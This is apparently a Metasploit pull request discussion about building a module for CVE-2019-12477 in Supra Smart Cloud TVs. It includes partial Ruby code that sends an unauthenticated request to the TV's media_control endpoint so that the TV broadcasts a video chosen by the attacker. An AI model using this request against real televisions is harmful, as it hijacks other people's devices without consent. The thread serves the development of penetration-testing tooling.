Metasploit-framework: Supra Smart Cloud TV - CVE-2019-12477

smells like some 10hrs of epic sax man on this one. @ccondon-r7 you up to test the module?

Since you need to send a GET request, you'll want to use send_request_cgi from HttpClient. I think you've done this before.

It's probably a good idea to serve the .m3u8 and video files yourself. Since you already have a working PoC, you can reuse the content you already have, assuming compatible licensing. I would use HttpServer to serve the files.

For an idea of where to start, you can take a look at https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_metaprogramming.rb, which uses both the HttpClient and HttpServer libraries.

Hope this helps. Let me know if you have questions.

I am stuck in serving .m3u8 file, could you suggest something.

    register_options(
      [
        Opt::RPORT(80)
      ])
  end

  def run_host(ip)
    fpath = "" 

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/remote/media_control?action=setUri&uri=#{fpath}"
    })
   end

I was providing a full path of the video from the data/ folder but that's an bad idea.

Serve it in on_request_uri from HttpServer. You can reference the full URL with get_uri. See the other module for an example.

https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/server.rb
https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-module-using-HttpServer-and-HttpClient

Also, you'll want to use vars_get in your request.

This works so far,

def run
    res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => "/remote/media_control?action=setUri&uri=#{"data/fbroadcast.m3u8"}"
    })
        if res && res.code == 200
            print_good("Fake video was broadcasted")
        else
            print_error("No fake video was broadcasted")
        end
    end
end

Closing this, we have completed the task.